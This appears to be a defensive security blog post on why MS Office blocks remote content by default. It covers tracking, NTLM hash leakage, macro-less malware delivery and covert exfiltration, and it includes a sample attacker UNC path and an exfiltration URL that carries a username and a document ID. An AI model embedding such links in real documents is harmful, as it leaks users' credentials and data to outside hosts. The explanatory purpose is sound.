By Published on

Do you know how remote links behave in MS Office?

Do we have to worry about remote content loading automatically in MS Office applications (MS Word, MS Excel, MS PowerPoint, MS Outlook)?

You think you know all about the topic? Just read on.

Yes, it is very important to understand how remote links behave in MS Office, and this is exactly why Microsoft is conservative by default.

If remote content were downloaded automatically, the security and privacy impact could be imminent. It is not hypothetical, we have seen it many times in real attacks and real incidents.

On the other side, we know how people behave and how easily they click away all security prompts that get in the way to the content they "want".

Why remote content in MS Office is a security issue

If MS Word (or other MS Office apps) automatically fetched remote content (images, templates, OLE objects, data connections), an attacker would gain capabilities similar to active code, without using macros.

Automatic remote downloads would enable:

1. Silent tracking & deanonymization

A remote image request reveals:

  • user IP address,
  • timestamp (open time),
  • os / office version (via headers),
  • corporate network presence,
  • sometimes username or machine name (via proxies).

This allows:

  • confirmation that a target opened the document,
  • correlation of identities,
  • surveillance of internal users.

This is already considered dangerous in email clients, which is why MS Outlook blocks remote images by default.

2. Credential leakage (NTLM / Kerberos)

If MS Office automatically accesses:

  • \\attacker-server\share\image.png
  • or certain WebDAV/UNC paths,

MS Windows may attempt NTLM authentication, leaking:

  • NTLM hashes,
  • domain information.

This can lead to:

  • credential relay,
  • lateral movement,
  • domain compromise.

This class of issue is extremely well-documented.

3. Malware delivery without macros

Remote content allows:

  • payload swapping after delivery,
  • ime-based or geo-based attacks,
  • AV evasion (content changes post-scan).

Attack chain example:

  1. user receives harmless-looking .docx,

  2. days later, attacker replaces the remote image with:

    • a malformed image exploiting a parser bug,
    • or a weaponized OLE object.

  3. opening the document triggers exploitation.

This bypasses:

  • macro protections,
  • email gateway scanning,
  • static AV analysis.

4. Bypassing “no-macros” policies

Many organizations:

  • block macros entirely,
  • still allow .docx documents.

Remote content would allow:

  • logic, staging, and control without macros,
  • a “living off the document” technique.

This is one reason attackers historically abused:

  • linked templates,
  • DDE,
  • OLE links,
  • external data connections.

5. Data exfiltration

Documents can encode:

  • User data,
  • System information,
  • Document contents,

into URLs like:

https://attacker.com/log?u={USERNAME}&d={DOCID}

Automatic requests = covert exfiltration channel.